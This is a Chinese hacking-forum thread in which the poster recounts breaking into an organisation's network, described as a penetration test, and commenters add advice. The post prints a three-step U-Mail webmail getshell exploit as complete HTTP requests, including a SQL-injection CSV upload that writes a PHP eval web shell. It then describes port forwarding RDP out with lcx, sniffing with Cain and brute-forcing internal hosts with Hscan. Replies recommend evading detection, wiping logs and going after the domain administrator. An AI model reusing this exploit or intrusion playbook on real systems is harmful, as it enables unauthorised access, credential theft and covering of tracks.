请选择 进入手机版 | 继续访问电脑版
查看: 1746|回复: 19

[文章] 记得一次艰难的内网漫游

[复制链接]
  • TA的每日心情
    擦汗
    2017-7-22 21:50
  • 签到天数: 21 天

    [LV.4]偶尔看看III

    发表于 2016-7-3 15:13:25 | 显示全部楼层 |阅读模式
    1.png 进入红盟太极实验室也有段时间了,暑假也来了,昨天管理大大发话了,督促我们发帖了,那么今天发篇前段时间的干货吧。 c.gif
    因为这个站是一次渗透测试项目的站,所以全程打马赛克,请各位见谅。
    首先呢我看了下这个站主站没什么漏洞,也可以说我这个菜鸟啥都不会找不到漏洞吧。主站是个精良南方明显打过补丁的啥希望都没了, d.png 我们领导是让我给他搞个能进OA系统的管理员账户,于是我就看了下OA。结果让我感到无奈啊, f.png 这特么的是泛微CMS挺蛋疼的,你说我要是有一枚地下0day该有多好。 a.jpg
    2.png
    这真的挺蛋疼的百度上找了好多关于泛微CMS的漏洞没一个能用的,最后一点希望也破灭了。 b.gif
    无奈最后扫了下子域名发现了一个邮箱系统!居然是U-mailCMS感觉很脆的样子,我就到某云上面找了几篇关于U-mail的前台GETShell方法。恩就是只要三个步骤的那个。 g.png
    3.png
    具体GETShell操作如下:
    第一步,获得物理路径请求
    GET /webmail/client/mail/module/test.php HTTP/1.1
    Host: **.**.**.**
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    第二步,请求为,响应中获得PHPSESSID
    POST /webmail/fast/index.php?module=operate&action=login HTTP/1.1
    Host: **.**.**.**
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 30
    mailbox=system@**.**.**.**&link=?

    第三步,将PHPSESSID和路径写入如下请求,执行getshell EXP即可
    POST /webmail/fast/pab/index.php?module=operate&action=contact-import HTTP/1.1
    Host: **.**.**.**
    Proxy-Connection: keep-alive
    Content-Length: 553
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://**.**.**.**
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary69fA5vmkAMLB8gmA
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
    Cookie: PHPSESSID=53ad27d7a64bd68d372be8a94985606d
    ------WebKitFormBoundary69fA5vmkAMLB8gmA
    Content-Disposition: form-data; name="import_file"; filename="getshell.csv"
    Content-Type: application/vnd.ms-excel
    Ãû,µç×ÓÓʼþµØÖ·
    hello1,hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'c:\\umail\\WorldClient\\html\\shell.php'#
    ------WebKitFormBoundary69fA5vmkAMLB8gmA
    Content-Disposition: form-data; name="import_group"
    10
    ------WebKitFormBoundary69fA5vmkAMLB8gmA
    Content-Disposition: form-data; name="import_mode"
    ignore
    ------WebKitFormBoundary69fA5vmkAMLB8gmA--
            因为我也比较懒就没截这么多张图了具体看不懂的同学可以到某云的bugs/wooyun-2015-093049/这个地址看大牛怎么操作。只知道能GETShell就行了。 e.png
    4.png
    原本以为拿到Shell链接数据库就算大工告成了,结果没想到的是他把其他网站放在了内网其他的机器上面,这下就麻烦了难怪我搞了半天没找到OA系统的目录。出于无奈于是我就提权试下,结果还真是尴尬了。3389都开在内网。
    5.png
    出于无奈只好上传个lcx来转发端口,可笑的是我转发一下午没转发出来……后来让我朋友看下,他说我服务器接收不到转发的数据。那就算了换一台服务器搞,结果还真是转发出来了。
            端口转发应该就不用解释了,玩过的同学都应该知道怎么整的。
    6.png
    7.png
    执行完这两步骤就可以链接127.0.0.1然后我转发的端口是6677我就连接了127.0.0.1:6677
    8.png
    哦!我的天呐真是久违的一幕,我真是太爱你了。好了话不多说直接上去干。我先是在服务器上面传了个Cain嗅探工具你懂得嘻嘻~不过可悲的是我嗅探了一下午都没嗅探到东西,后来想想我知道了估计人家下班了我日。无奈我就穿了个Hscan上去爆破但愿有戏吧。
    结果真没让我失望!真的爆破到了好多内网机器。
    9.png
    其他的就不多说了上去就是干,一句话不和就是日他。 h.png
    10.png
    =,=

    评分

    参与人数 2i币 +7 收起 理由
    clocks + 2 支持原创
    小圈圈 + 5 支持原创

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

    发表于 2016-7-3 15:34:21 | 显示全部楼层
    不错不错,继续努力。想做一个真正的黑客还很远。黑客最重要的是什么?攻击成功的同时不暴露自己。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

    发表于 2016-7-3 15:34:52 | 显示全部楼层
    你说的徽章一事,会解决的。只是最近比较忙没时间处理

    点评

    谢谢管理大大  详情 回复 发表于 2016-7-3 15:37
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-7-22 21:50
  • 签到天数: 21 天

    [LV.4]偶尔看看III

     楼主 发表于 2016-7-3 15:37:23 | 显示全部楼层

    RE: 记得一次艰难的内网漫游

    wuyan 发表于 2016-7-3 15:34
    你说的徽章一事,会解决的。只是最近比较忙没时间处理

    谢谢管理大大
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-6-30 15:15
  • 签到天数: 186 天

    [LV.7]常住居民III

    发表于 2016-7-3 15:40:56 | 显示全部楼层
    表示不推荐一开始就嗅探,嗅探太容易被发现了,话说爆破的字典应该不是默认的吧?如不过不是默认的话可以吧如何收集到的字典也写出来也是给大家提供一个思路,还有就是也不推荐自己添加用户,至于怎么获得管理员的用户名密码这个就不多说了。也不看看是否存在域,存在域的话直接一个域管理员就通杀了啊。。。。

    点评

    惊现大神!!!!!!  详情 回复 发表于 2016-7-3 15:51
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-7-22 21:50
  • 签到天数: 21 天

    [LV.4]偶尔看看III

     楼主 发表于 2016-7-3 15:51:45 | 显示全部楼层

    RE: 记得一次艰难的内网漫游

    No0d1es 发表于 2016-7-3 15:40
    表示不推荐一开始就嗅探,嗅探太容易被发现了,话说爆破的字典应该不是默认的吧?如不过不是默认的话可以吧 ...

    惊现大神!!!!!!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-10-1 06:59
  • 签到天数: 308 天

    [LV.8]以坛为家I

    发表于 2016-7-3 19:08:19 | 显示全部楼层
    把你hscan的爆破字典来一份
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    前天 09:37
  • 签到天数: 726 天

    [LV.9]以坛为家II

    发表于 2016-7-3 19:10:30 | 显示全部楼层
    做内网,不到万不得已千万别去爆破和嗅探

    点评

    大神说的对! 下次会谨慎行事的  详情 回复 发表于 2016-7-3 21:12
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

    发表于 2016-7-3 19:43:54 | 显示全部楼层
      重要的事情说三篇

      日志 痕迹 搽干净
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-3-27 09:58
  • 签到天数: 145 天

    [LV.7]常住居民III

    发表于 2016-7-3 20:17:28 | 显示全部楼层
    打码不行啊   这公司域名倒是不错三个数字- -
    回复 支持 反对

    使用道具 举报

    高级模式
    B Color Image Link Quote Code Smilies |上传

    本版积分规则

    快速回复 返回顶部 返回列表